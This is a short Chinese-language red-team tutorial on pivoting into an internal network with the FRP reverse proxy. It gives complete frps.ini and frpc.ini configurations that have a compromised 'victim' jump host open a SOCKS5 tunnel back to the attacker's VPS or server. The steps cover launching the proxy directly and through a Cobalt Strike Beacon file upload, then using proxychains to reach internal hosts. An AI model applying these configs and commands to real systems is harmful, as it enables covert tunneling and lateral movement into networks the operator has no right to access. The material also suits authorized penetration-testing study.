FRP 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
frp 项目地址:https://github.com/fatedier/frp/blob/dev/README_zh.md
假如当前的网络拓朴如下,172.16.1.2 无法直接访问 10.1.1.2,需要通过 frp 代理访问。
frp vps 代理#
172.16.1.2 - <172.16.1.4,10.1.1.3 > 10.1.1.2
攻击者(172.16.1.2):
配置 frps.in 文件
配置文件如下:
frps.ini
[common]
bind_port = 7000
bind_addr = 0.0.0.0
受害者(跳板机:172.16.1.4)如下配置:
配置 frpc.ini,内容如下:
frpc.ini
[common]
server_addr = vpsip
server_port = 7000
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
设置完成后,先攻击者服务器开启监听
./frps -c frps.ini
受害者端执行
frpc.exe -c frpc.ini
浏览器设置代理访问
proxychains 配置代理远程登录
CS 配置 frp#
假如拓朴如下,和之前的操作其实一致。
172.16.1.3 - <172.16.1.4,10.1.1.4 > 10.1.1.3
用 CS 的 Beacon 运行 frpc 时,配置文件和程序都用绝对路径。利用文件上传 frpc.exe 和 frpc.ini 文件来进行代理。
配置文件如下
frps.ini
[common]
bind_port = 7000
frpc.ini
[common]
server_addr = 172.16.1.3
server_port = 7000
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
代理成功。